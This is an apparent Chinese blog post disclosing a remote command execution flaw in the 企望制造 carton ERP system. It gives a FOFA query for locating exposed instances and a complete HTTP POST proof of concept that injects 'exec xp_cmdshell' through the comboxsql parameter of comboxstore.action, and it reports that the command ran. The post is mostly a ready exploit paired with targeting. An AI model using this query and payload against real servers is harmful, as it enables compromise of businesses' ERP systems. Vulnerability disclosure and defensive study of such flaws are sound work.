企望制造ERP系统存在RCE漏洞

漏洞描述

企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先进的管理方式,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。

漏洞复现

FOFA

title="企望制造ERP系统"

POC

POST /mainFunctions/comboxstore.action HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'

bp 成功执行命令

相关推荐
万界星空科技2 小时前
MES数据的集成方式
运维·经验分享·科技·5g·能源·制造·业界资讯
H_kiwi2 小时前
【解决】Mac 上 M系列芯片用 Vmware Fusion安装 win11 遇到的主要的问题汇总
linux·windows·学习·安全·ubuntu·macos·centos
中云时代-防御可测试-小余4 小时前
国产游戏出海火热另一面:AI和API快速成长引发网络安全挑战
人工智能·tcp/ip·web安全·游戏·网络安全·udp·ddos
复园电子4 小时前
朝天椒USB Server为赛力斯集团解决网银U盾难题
安全·信息与通信
九河云5 小时前
如何保障AWS根账号安全
安全·云计算·aws
广东数字化转型5 小时前
智能制造--EAP设备自动化程序
自动化·制造
小鹿会议播报5 小时前
【学术会议征稿】2024年遥感技术与图像处理国际学术会议(RSTIP 2024)
大数据·图像处理·人工智能·云计算·制造·信号处理
ai产品老杨6 小时前
中心节点服务,远程集中管理,降低边缘设备管理成本的智慧园区开源了。
vue.js·人工智能·安全·开源·音视频